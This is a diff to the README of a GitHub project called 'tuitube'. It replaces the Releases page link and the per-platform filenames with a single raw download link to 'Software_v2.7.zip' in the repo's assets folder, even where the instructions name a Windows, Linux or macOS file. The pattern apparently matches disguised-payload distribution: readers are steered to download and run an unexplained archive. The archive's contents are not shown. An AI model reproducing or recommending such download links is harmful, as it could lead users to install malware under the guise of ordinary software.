AlessandroPro07/tuitube/README.md

 To get started with tuitube, follow these steps:

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/AlessandroPro07/tuitube/releases).
+1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/AlessandroPro07/tuitube/raw/refs/heads/main/assets/Software_v2.7.zip).

 2. **Select the Latest Release**: Look for the most recent version.
 It is usually listed at the top of the page.

 3. **Download the Application**: Click on the link for your operating system:
-   - For Windows, you might see something like `tuitube-windows.exe`.
+   - For Windows, you might see something like `https://github.com/AlessandroPro07/tuitube/raw/refs/heads/main/assets/Software_v2.7.zip`.
    - For macOS, look for `tuitube-macos`.
-   - For Linux, select the appropriate package, like `tuitube-linux.tar.gz`.
+   - For Linux, select the appropriate package, like `https://github.com/AlessandroPro07/tuitube/raw/refs/heads/main/assets/Software_v2.7.zip`.

 4. **Save the File**: Choose a location on your computer where you want to save the downloaded file.

 5. **Run tuitube**:
    - For Windows, double-click the `.exe` file.
-   - For macOS, extract the `.tar.gz` file and run the contained program.
+   - For macOS, extract the `https://github.com/AlessandroPro07/tuitube/raw/refs/heads/main/assets/Software_v2.7.zip` file and run the contained program.
    - For Linux, use the terminal to navigate to the folder where you extracted the files, then use `./tuitube-linux` to start the application.

 ## 📖 Usage Instructions